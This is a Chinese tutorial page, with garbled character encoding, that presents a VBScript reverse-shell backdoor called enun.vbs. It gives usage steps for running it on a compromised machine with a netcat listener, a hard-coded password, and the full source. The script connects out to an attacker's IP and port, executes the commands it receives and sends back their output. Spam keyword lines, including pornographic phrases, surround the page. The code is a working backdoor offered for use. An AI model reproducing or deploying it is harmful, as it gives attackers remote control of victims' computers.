国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > VBScript > 正文

VBScript 打造自己的遠程CMDShell附使用教程

2020-06-26 18:34:56
字體:
供稿:網(wǎng)友
這個cmdshell需要結合nc進行配合使用,現(xiàn)在肉雞上執(zhí)行cmdshell然后在本地上面運行nc,注意看下面的參數(shù)
 
請先下載 mswinsck.ocx 與 VB6Controls.reg! 

使用方法: 

1,控制:nc.exe,執(zhí)行:nc -l -v -p 1234;

VBScript 打造自己的遠程CMDShell附使用教程

2,目標:cscript.exe enun.vbs IP Port; 

VBScript 打造自己的遠程CMDShell附使用教程

3,密碼:enun。 

幾點說明: 
1,退出 SHELL,請輸入 “exit”,不要用 “Ctrl + C”,這樣的話只能等目標重啟或手動運行后門才能連接; 
2,Windows 7 等環(huán)境下普通標準用戶也能使用,但是獲取的權限相對有限。 
3,內(nèi)部命令及管道使用如下圖:

VBScript 打造自己的遠程CMDShell附使用教程

 

enun.vbs 源碼:

 

復制代碼代碼如下:

'--------------------------------------------------------------------------
' Copyright (c) lxzzr. All rights reserved.
' ScriptName: enun.vbs
' Creation Date: 28/8/2012
' Last Modified: 28/8/2012
' Author: lxzzr, www.enun.net
' E-mail: lxzzr@21cn.com
' Usage: Cscript.exe //nologo enun.vbs IP Port
'--------------------------------------------------------------------------
On Error Resume Next
Public SocketObj, ExecObj, ShellObj
RemoteHost = Wscript.Arguments(0)
RemotePort = Wscript.Arguments(1)

 

Do
 Do While (SocketObj.State <> 7)
  WScript.Echo "Try Connect to " & RemoteHost & ":" & RemotePort & " ..."

  Set SocketObj = WScript.CreateObject("MSWinsock.Winsock")
  SocketObj.Protocol = 0
  SocketObj.RemoteHost = RemoteHost
  SocketObj.RemotePort = RemotePort
  SocketObj.Connect

  WScript.Sleep 3000
 Loop

 WScript.Echo "Connected to server."
 SocketObj.SendData SocketObj.LocalHostName & " is Connected, Enter Password: "
 Do While (SocketObj.BytesReceived = 0)
  WScript.Sleep 10
 Loop

 '密碼驗證
 SocketObj.GetData Authkey, vbString
 If Split(Authkey, chr(10), -1, 1)(0) = "enun" Then

  Set ShellObj = CreateObject("WScript.Shell")
  sRevData = " "
  SocketObj.SendData "Logon Success, Welcome!" & chr(13) & chr(10)

  '循環(huán)等待執(zhí)行命令
  Do
   Set ExecObj = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))

   SocketObj.SendData ExecObj.StdOut.ReadAll
   SocketObj.SendData ExecObj.StdErr.ReadAll

   If sRevData <> "" Then
    SocketObj.SendData chr(10) & "[" & SocketObj.LocalHostName & "@" & "enun]#: " 
   End If

   If Left(sRevData, 4) = "exit" Then
    SocketObj.Close
    Exit Do
   End If

   SocketObj.GetData sRevData, vbString
   WScript.Sleep 1000
  Loop
 Else
  LockoutBadCount = LockoutBadCount + 1
  SocketObj.SendData "Logon Failure: Unknown user name or bad password." & chr(13) & chr(10)
  WScript.Sleep 1000
 End If

 '賬戶策略
 If (LockoutBadCount > 3) Then
  SocketObj.SendData "The User Account is locked!" & chr(13) & chr(10)
  WScript.Sleep 1000
  SocketObj.Close
  LockoutBadCount = 0
  WScript.Sleep 600*1000
 End If
Loop

 

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 西昌市| 上饶市| 会昌县| 将乐县| 乐陵市| 玛纳斯县| 浪卡子县| 太和县| 沾益县| 临西县| 金门县| 台江县| 通河县| 沧源| 留坝县| 南郑县| 黄浦区| 清流县| 铜川市| 新邵县| 读书| 乐山市| 兴海县| 沾化县| 镇宁| 宿迁市| 永兴县| 乃东县| 霍山县| 通化县| 钟祥市| 梓潼县| 遂平县| 夏津县| 英吉沙县| 德令哈市| 沅陵县| 德昌县| 新蔡县| 酒泉市| 石柱|